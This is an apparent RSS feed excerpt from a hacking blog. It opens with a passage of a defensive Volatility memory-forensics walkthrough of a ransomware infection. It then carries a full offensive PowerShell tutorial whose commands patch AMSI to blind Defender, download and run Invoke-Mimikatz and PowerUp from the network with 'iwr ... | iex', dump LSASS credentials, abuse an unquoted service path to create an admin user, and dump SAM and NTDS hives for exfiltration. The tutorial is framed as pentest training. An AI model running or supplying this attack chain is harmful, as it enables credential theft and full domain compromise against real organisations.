<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="408" src="https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-1024x408.webp" alt="listing the processes on the image with volatility 3" class="wp-image-18598" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-1024x408.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-768x306.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility-1536x612.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/4-listing-active-processes-with-volatility.webp 1584w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Suspicious processes are not always easy to spot. It depends on the attacker’s tactics. Ransomware processes, unlike persistence mechanisms, are often obvious because attackers tend to pick violent or alarming names for encryptors. But that’s not always the case, so let’s give our image a closer look.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="251" src="https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process-1024x251.webp" alt="finding the ransomware process" class="wp-image-18599" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process-1024x251.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process-300x73.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process-768x188.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/5-finding-a-ransomware-process.webp 1339w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Among other processes, a ransomware process sticks out. You may also notice or4qtckT.exe and other processes with unknown names. Random executable names are not definitive proof of maliciousness, but they’re a reliable starting point for closer inspection. Some legitimate software may also generate processes with random names, for example, Dr.Web, a Russian antivirus.
When a process name looks random, check several things: the process parent, the process start time (did it start right before the incident?), open network sockets, loaded DLLs, and whether the executable exists on disk or only in memory. Processes that only exist in the RAM image (no matching file on disk) often indicate in-memory unpacking or fileless behavior. These are important signals in malware analysis. Use plugins like <code>windows.psscan</code> (process scan) to find processes that <code>pslist</code> might miss and <code>windows.pstree</code> to visualize parent/child relationships. Also check <code>windows.dlllist</code> to see suspicious DLLs loaded into a process. Injected code often pulls suspicious DLL names or shows unnatural memory protections on executable pages.
<h3 class="wp-block-heading">Parent Relationships</h3>
Once you find malware, your next step is to find its parent. A parent is the process that launches another process. This is how you unravel the attack by going back in the timeline. windows.pslist has two important columns: PID (process ID) and PPID (parent process ID). The parent of WanaDecryptor has PID 2732. We can quickly search and find it.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="210" src="https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent-1024x210.webp" alt="finding the parent of the ransomware process with volatility 3" class="wp-image-18600" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent-1024x210.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent-300x61.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent-768x157.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/6-found-the-parent.webp 1324w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Now we know that the process with a random name or4qtckT.exe initiated WanaDecryptor. As it might not be the only process initiated by that parent, let’s grep its PID and find out:
<code>bash$ > vol -f infected.vmem windows.psscan | grep 2732</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="150" src="https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-1024x150.webp" alt="finding other processes initiated by the parent" class="wp-image-18602" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-1024x150.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-300x44.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-768x112.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent-1536x225.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/7-found-other-processes-initiated-by-the-parent.webp 1612w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
The parent process can show how the attacker entered the machine. It might be a user process opened by a phishing email, a scheduled task that ran at an odd hour, or a system service that got abused. Tracing parents helps you decide whether this was an interactive compromise (an attacker manually ran something) or an automated spread. If you see network-facing services as parents or child processes that match known service names (for example, svchost.exe variants), dig deeper. Some ransomware uses service abuse, scheduled tasks, or built-in Windows mechanisms to reach higher privileges or persistence.
<h3 class="wp-block-heading">Handles</h3>
In Windows forensics, when we say we are “viewing the handles of a process,” we mean examining the internal references that a process has opened to system resources. A handle in Windows is essentially a unique identifier (a number) that a process uses to access an operating system object. Processes do not work directly with raw resources like files, registry keys, threads, or network connections. Instead, when a process needs access to something, it asks Windows to open that object, and Windows returns a handle. That handle acts like a ticket which the process can use to interact with the object safely.
<code>bash$ > vol -f infected.vmem windows.handles --pid 2732</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="398" src="https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-1024x398.webp" alt="listing handles used by the malware in volatility 3" class="wp-image-18601" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-1024x398.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-300x117.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-768x299.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware-1536x597.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/8-found-handles-used-by-the-malware.webp 1618w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
First, we see a user (hacker) directory. That should be noted for further analysis, because user directories contain useful evidence in <code>NTUSER.DAT</code> and <code>USRCLASS.DAT</code>. These objects can be accessed after a full disk capture and will include thorough information about shares, directories, and objects the user accessed.
Inspecting the handles, we found an .eky file that was used to encrypt the system
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="292" src="https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system-1024x292.webp" alt="finding .eky file used to encrypt the system" class="wp-image-18603" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system-1024x292.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system-300x85.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system-768x219.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/9-found-eky-file-used-to-encrypt-the-system.webp 1478w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
This .eky file contains the secret the attacker needed to lock files on the system. These keys are brought from the outside and are not native system objects. Obtaining this key does not guarantee successful decryption. It depends on what kind of key file it is and how it was protected.
When you find cryptographic artifacts in handles, copy the file bytes, if possible, and get the hashes (SHA-256) before touching them. Export them into an isolated analysis workstation. Then compare the artifact to public resources and sandbox reports. Not every key-like file is the private key you need to decrypt. Sometimes attackers include only a portion or an encrypted container that requires an additional password or remote secret. Public repositories and collective projects (for example, NoMoreRansom and vendor decryptors) may already have decryption tools for some ransomware families, so check there before calling data irrecoverable.
<h3 class="wp-block-heading">Command Line</h3>
Now let’s inspect the command lines of the processes. Listing all command lines gives you more visibility to spot malicious behavior:
<code>bash$ > vol -f infected.vmem windows.cmdline</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="312" src="https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-1024x312.webp" alt="listing the command line of the processes with volatility 3" class="wp-image-18604" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-1024x312.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-300x91.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-768x234.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes-1536x467.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/10-listed-the-command-line-of-the-processes.webp 1620w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
You can also narrow it down to the needed PIDs or file names:
<code>bash$ > vol -f infected.vmem windows.cmdline | grep or4</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="232" src="https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent-1024x232.webp" alt="listing command line of te malware" class="wp-image-18605" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent-1024x232.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent-300x68.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent-768x174.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/11-listed-the-command-line-of-the-parent.webp 1483w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
We can now see where the attack originated. After a successful compromise of a system or a domain, the attacker brought their malware to the system and encrypted it with their own keys.
The command line often contains the exact flags or network locations the attacker used (for example, -server 192.168.x.x or a path to an unpacker). Attackers sometimes use command-line switches to hide behavior, choose a configuration file, or provide a URL to download further payloads. If you can capture the command line, you often capture the attacker’s intent in plain text, which is invaluable evidence. Also check process environment variables, if those are available, because they might contain temporary filenames, credentials, or proxy settings the malware used.
<h3 class="wp-block-heading">Getting Hashes</h3>
Obviously the investigation does not stop here. You need to extract the file from memory, calculate its hash, and inspect how the malware behaves on AnyRun, VirusTotal, and other platforms. To extract the malware we first need to find its address in memory:
<code>bash$ > vol -f infected.vmem windows.file | grep -i or4qtckT</code>
Let’s pick the second hit and extract it now:
<code>bash$ > vol -f infected.vmem windows.dumpfiles --physaddr 0x1fcaf798</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="291" src="https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware-1024x291.webp" alt="extracting the malware from the memory for later analysis" class="wp-image-18606" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware-1024x291.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware-300x85.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware-768x218.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/12-exported-the-malware.webp 1537w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
The ImageSection dump (.img) usually looks like the program that was running in memory. It can include changes made while the program was loaded, such as unpacked code or adjusted memory addresses. The DataSection dump (.dat), on the other hand, shows what the file looks like on disk, or at least part of it. That’s why there are two dumps with the same name. Volatility detected both the in-memory version and the on-disk version of or4qtckT.exe
Next we generate the hash of the DataSectionObject and look it up on VirusTotal:
<code>bash$ > sha256sum file.0x1fcaf798.0x85553db8.DataSectionObject.or4qtckT.exe.dat</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="128" src="https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware-1024x128.webp" alt="getting the file hash" class="wp-image-18607" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware-1024x128.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware-300x37.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware-768x96.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/13-got-the-hash-of-the-malware.webp 1537w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
We recommend using robust hashing (SHA-256 instead of MD5) to avoid collision issues.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="381" src="https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-1024x381.webp" alt="running the hash in VirusTotal" class="wp-image-18608" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-1024x381.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-300x112.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-768x286.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report-1536x572.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/14-obtained-virus-total-report.webp 1725w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
For more information, go to Hybrid Analysis to get a detailed report on the malware’s capabilities.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="374" src="https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-1024x374.webp" alt="Hybrid Analysis report of the WannaDecryptor" class="wp-image-18609" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-1024x374.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-300x109.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-768x280.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report-1536x560.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/15-got-the-hybrid-analysis-report.webp 1568w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Some platforms like VirusTotal, AnyRun, Hybrid Analysis, Joe Sandbox will produce behavioral reports, network traffic captures, and dropped files that help you map capabilities like network C2, persistence techniques, and whether the sample attempts to self-propagate. In our case, this sample has been found in online sandbox reports and is flagged with ransomware/WannaCry-like behavior. Sandbox summaries showed malicious activity consistent with file encryption and automated spread. When reading sandbox output, focus on three things: dropped files, outbound connections, and any use of legacy Windows features (SMB, WMI, PsExec) to move laterally.
<h3 class="wp-block-heading">Practical next steps for the investigator</h3>
First, preserve the memory image and any extracted files exactly as you found them. Do not run suspicious samples on your analysis workstation unless it is fully isolated. Second, gather network indicators (IP addresses, domain names) and add them to your blocklists and detection rules. Third, check for related persistence mechanisms on disk and in registry hives, if you have the disk image. Scheduled tasks, <code>HKLM\Software\Microsoft\Windows\CurrentVersion\Run</code> entries, service modifications, and driver loads are common. Fourth, feed the sample hash and any dropped files into public repositories and vendor sandboxes. These can help you find other victims and understand the campaign’s breadth. Finally, document everything, every command and every timestamp, so you can later show how the evidence was acquired, processed, and analyzed. For memory-specific checks, run Volatility plugins such as <code>malfind</code> (detect injection), <code>ldrmodules</code> (module loads), <code>dlllist</code>, <code>netscan</code> (network sockets), and registry plugins to inspect in-memory registry hives.
<h2 class="wp-block-heading">Summary</h2>
Think of memory as the attacker’s black box. It often holds the fleeting traces disk images miss, things like unpacked code, live network sockets, and cryptographic keys. Prioritizing memory first allows you to catch those traces before they’re gone. Volatility can help you list running processes, trace parent–child chains, inspect handles and command lines. You can also dump in-memory binaries and use them as artifacts for a more thorough analysis. Submitting these artifacts to sandboxes will give you a clear picture of what happened on your network, which will give you valuable IOCs to prevent this attack and techniques used. As a forensic analyst you are required to preserve the image intact, work with suspicious files in an isolated lab, and write down every command and timestamp to keep the chain of custody reliable and actions repeatable.
If you need forensic assistance, we offer professional services to help investigate and mitigate incidents. Additionally, we provide classes on digital forensics for those looking to expand their skills and understanding in this field.

For more Memory Forensics, check out our upcoming Memory Forensics class.
The post <a href="https://hackers-arise.com/digital-forensics-investigating-a-ransomware-attack/">Digital Forensics: Investigating a Ransomware Attack</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover</title>
<link>https://hackers-arise.com/powershell-for-hackers-privilege-escalation-and-organization-takeover/</link>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Wed, 08 Oct 2025 14:49:57 +0000</pubDate>
<category><![CDATA[Cybersecurity Tools]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[Powershell]]></category>
<category><![CDATA[Windows]]></category>
<category><![CDATA[Active Directory]]></category>
<category><![CDATA[AMSI bypass]]></category>
<category><![CDATA[automation]]></category>
<category><![CDATA[credential dumping]]></category>
<category><![CDATA[domain takeover]]></category>
<category><![CDATA[Evil-WinRM]]></category>
<category><![CDATA[HACKING]]></category>
<category><![CDATA[lateral-movement]]></category>
<category><![CDATA[Mimikatz]]></category>
<category><![CDATA[NTDS]]></category>
<category><![CDATA[offensive-security]]></category>
<category><![CDATA[OPSEC]]></category>
<category><![CDATA[OSINT]]></category>
<category><![CDATA[post-exploitation]]></category>
<category><![CDATA[PowerShell]]></category>
<category><![CDATA[PowerUp]]></category>
<category><![CDATA[privilege escalation]]></category>
<category><![CDATA[red-team]]></category>
<category><![CDATA[SAM]]></category>
<category><![CDATA[unquoted-service-path]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=18578</guid>
<description><![CDATA[Use AMSI bypasses, Mimikatz, and PowerUp to escalate from a single foothold into full domain compromise
The post <a href="https://hackers-arise.com/powershell-for-hackers-privilege-escalation-and-organization-takeover/">PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back hackers! 
For quite an extensive period of time we have been covering different ways PowerShell can be used by hackers. We learned the basics of reconnaissance, persistence methods, survival techniques, evasion tricks, and mayhem methods. Today we are continuing our study of PowerShell and learning how we can automate it for real hacking tasks such as privilege escalation, AMSI bypass, and dumping credentials. As you can see, PowerShell may be used to exploit systems, although it was never created for this purpose. Our goal is to make it simple for you to automate exploitation during pentests. Things that are usually done manually can be automated with the help of the scripts we are going to cover. Let’s start by learning about AMSI.
<h2 class="wp-block-heading">AMSI Bypass</h2>
<h3 class="wp-block-heading">Repo:</h3>
<a href="https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell">https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell</a>
AMSI is the Antimalware Scan Interface. It is a Windows feature that sits between script engines like PowerShell or Office macros and whatever antivirus or EDR product is installed on the machine. When a script or a payload is executed, the runtime hands that content to AMSI so the security product can scan it before anything dangerous runs. It makes scripts and memory activity visible to security tools, which raises the bar for simple script-based attacks and malware. Hackers constantly try to find ways to keep malicious content from ever being presented to it, or to change the content so it won’t match detection rules. You will see many articles and tools that claim to bypass AMSI, but soon after they are released, Microsoft patches the vulnerabilities. Since it’s important to be familiar with this attack, let’s test our system and try to patch AMSI.
First we need to check if the Defender is running on a Russian target:
<code>PS > Get-WmiObject -Class Win32_Service -Filter “Name=’WinDefend’”</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="170" src="https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running-1024x170.webp" alt="checking if the defender is running on windows" class="wp-image-18579" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running-1024x170.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running-300x50.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running-768x127.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running.webp 1079w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
And it is. If it was off, we would not need any AMSI bypass and could jump straight to our explorations.
<h3 class="wp-block-heading">Patching AMSI</h3>
Next, we start patching AMSI with the help of our script, which you can find at the following link:
<a href="https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/shantanukhande-amsi.ps1">https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/shantanukhande-amsi.ps1</a>
As you know by now, there are a few ways to execute scripts in PowerShell. We will use a basic one for demonstration purposes:
<code>PS > .\shantanukhande-amsi.ps1</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="370" src="https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi-1024x370.webp" alt="patching amsi with a powershell script" class="wp-image-18580" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi-1024x370.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi-300x108.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi-768x277.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi.webp 1127w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
If your output matches ours, then AMSI has been successfully patched. From now on, the Defender does not have access to your PowerShell sessions and any kind of scripts can be executed in it without restriction. It’s important to mention that some articles on AMSI bypass will tell you that downgrading to PowerShell Version 2 helps to evade detection, but that is not true. At least not anymore. Defender actively monitors all of your sessions and these simple tricks will not work.
<h2 class="wp-block-heading">Dumping Credentials with Mimikatz</h2>
<h3 class="wp-block-heading">Repo:</h3>
<a href="http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1">http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1</a>
Since you are free to run anything you want, we can execute Mimikatz right in our session. Note that we are using Invoke-Mimikatz.ps1 by g4uss47, and it is the updated PowerShell version of Mimikatz that actually works. For OPSEC reasons we do not recommend running Mimikatz commands that touch other hosts because network security products might pick this up. Instead, let’s dump LSASS locally and inspect the results:
<code>PS > iwr http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1 | iex  </code>
<code>PS > Invoke-Mimikatz -DumpCreds</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="915" height="438" src="https://hackers-arise.com/wp-content/uploads/2025/10/3-dumping-hashes-with-mimikatz.webp" alt="dumping lsass with mimikatz powershell script Invoke-Mimikatz.ps1" class="wp-image-18581" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/3-dumping-hashes-with-mimikatz.webp 915w, https://hackers-arise.com/wp-content/uploads/2025/10/3-dumping-hashes-with-mimikatz-300x144.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/3-dumping-hashes-with-mimikatz-768x368.webp 768w" sizes="(max-width: 915px) 100vw, 915px" /></figure>
Now we have the credentials of brandmanager. If we compromised a more valuable target in the domain, like a server or a database, we could expect domain admin credentials. You will see this quite often.
<h2 class="wp-block-heading">Privilege Escalation with PowerUp</h2>
Privilege escalation is a complex topic. Frequently systems will be misconfigured and people will feel comfortable without realizing that security risks exist. This may allow you to skip privilege escalation altogether and jump straight to lateral movement, since the compromised user already has high privileges. There are multiple vectors of privilege escalation, but among the most common ones are unquoted service paths and insecure file permissions. While insecure file permissions can be easily abused by replacing the legitimate file with a malicious one of the same name, unquoted service paths may require more work for a beginner. That’s why we will cover this attack today with the help of PowerUp. Before we proceed, it’s important to mention that this script has been known to security products for a long time, so be careful.
<h3 class="wp-block-heading">Finding Vulnerable Services</h3>
Unquoted Service Path is a configuration mistake in Windows services where the full path to the service executable contains spaces but is not wrapped in quotation marks. Because Windows treats spaces as separators when resolving file paths, an unquoted path like <code>C:\Program Files\My Service\service.exe</code> can be interpreted ambiguously. The system may search for an executable at earlier, shorter segments of that path (for example <code>C:\Program.exe</code> or <code>C:\Program Files\My.exe</code>) before reaching the intended <code>service.exe</code>. A hacker can place their own executable at one of those earlier locations, and the system will run that program instead of the real service binary. This works as a privilege escalation method because services typically run with higher privileges.
Let’s run PowerUp and find vulnerable services:
<code>PS > iwr https://raw.githubcontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Privesc/PowerUp.ps1 | iex</code>  
<code>PS > Get-UnquotedService</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="950" height="422" src="https://hackers-arise.com/wp-content/uploads/2025/10/4-found-vulnerable-services-for-privilege-escalation.webp" alt="listing vulnerable unquoted services to privilege escalation" class="wp-image-18582" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/4-found-vulnerable-services-for-privilege-escalation.webp 950w, https://hackers-arise.com/wp-content/uploads/2025/10/4-found-vulnerable-services-for-privilege-escalation-300x133.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/4-found-vulnerable-services-for-privilege-escalation-768x341.webp 768w" sizes="(max-width: 950px) 100vw, 950px" /></figure>
Now let’s test the service names and see which one will get us local admin privileges:
<code>PS > Invoke-ServiceAbuse -Name 'Service Name'</code>
If successful, you should see the name of the service abused and the command it executed. By default, the script will create and add user john to the local admin group. You can edit it to fit your needs.
The results can be tested:
<code>PS > net user john</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="814" height="354" src="https://hackers-arise.com/wp-content/uploads/2025/10/5-escalated-privileges-on-windows-with-powerup.webp" alt="abusing an unqouted service with the help of PowerUp.ps1" class="wp-image-18583" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/5-escalated-privileges-on-windows-with-powerup.webp 814w, https://hackers-arise.com/wp-content/uploads/2025/10/5-escalated-privileges-on-windows-with-powerup-300x130.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/5-escalated-privileges-on-windows-with-powerup-768x334.webp 768w" sizes="(max-width: 814px) 100vw, 814px" /></figure>
Now we have an admin user on this machine, which can be used for various purposes.
<h2 class="wp-block-heading">Attacking NTDS and SAM</h2>
<h3 class="wp-block-heading">Repo:</h3>
<a href="https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper">https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper</a>
With enough privileges we can dump NTDS and SAM without having to deal with security products at all, just with the help of native Windows functions. Usually these attacks require multiple commands, as dumping only NTDS or only a SAM hive does not help. For this reason, we have added a new script to our repository. It will automatically identify the type of host you are running it on and dump the needed files. NTDS only exists on Domain Controllers and contains the credentials of all Active Directory users. This file cannot be found on regular machines. Regular machines will instead be exploited by dumping their SAM and SYSTEM hives. The script is not flagged by any AV product. Below you can see how it works.
<h3 class="wp-block-heading">Attacking SAM on Domain Machines</h3>
To avoid issues, bypass the execution policy:
<code>PS > powershell -ep bypass</code>
Then dump SAM and SYSTEM hives:
<code>PS > .\ntds.ps1</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1003" height="446" src="https://hackers-arise.com/wp-content/uploads/2025/10/6-dumping-sam.webp" alt="dumping sam and system hives with ntds.ps1" class="wp-image-18584" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/6-dumping-sam.webp 1003w, https://hackers-arise.com/wp-content/uploads/2025/10/6-dumping-sam-300x133.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/6-dumping-sam-768x342.webp 768w" sizes="(max-width: 1003px) 100vw, 1003px" /></figure>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="874" height="327" src="https://hackers-arise.com/wp-content/uploads/2025/10/7-listing-sam-and-system-hive-dumps.webp" alt="listing sam and system hive dumps" class="wp-image-18585" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/7-listing-sam-and-system-hive-dumps.webp 874w, https://hackers-arise.com/wp-content/uploads/2025/10/7-listing-sam-and-system-hive-dumps-300x112.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/7-listing-sam-and-system-hive-dumps-768x287.webp 768w" sizes="(max-width: 874px) 100vw, 874px" /></figure>
Wait a few seconds and find your files in C:\Temp. If the directory does not exist, it will be created by the script.
Next we need to exfiltrate these files and extract the credentials:
<code>bash$ > secretsdump.py -sam SAM -system SYSTEM LOCAL</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="350" src="https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump-1024x350.webp" alt="extracting creds from sam hive" class="wp-image-18586" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump-1024x350.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump-300x103.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump-768x263.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump.webp 1471w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<h3 class="wp-block-heading">Attacking NTDS on Domain Controllers</h3>
If you have already compromised a domain admin, or managed to escalate your privileges on the Domain Controller, you might want to get the credentials of all users in the company.
We often use Evil-WinRM to avoid unnecessary GUI interactions that are easy to spot. Evil-WinRM allows you to load all your scripts from the machine so they will be executed without touching the disk. It can also patch AMSI, but be really careful.
Connect to the DC:
<code>c2 > evil-winrm -i DC -u admin -p password -s ‘/home/user/scripts/’</code>
Now you can execute your scripts:
<code>PS > ntds.ps1</code>
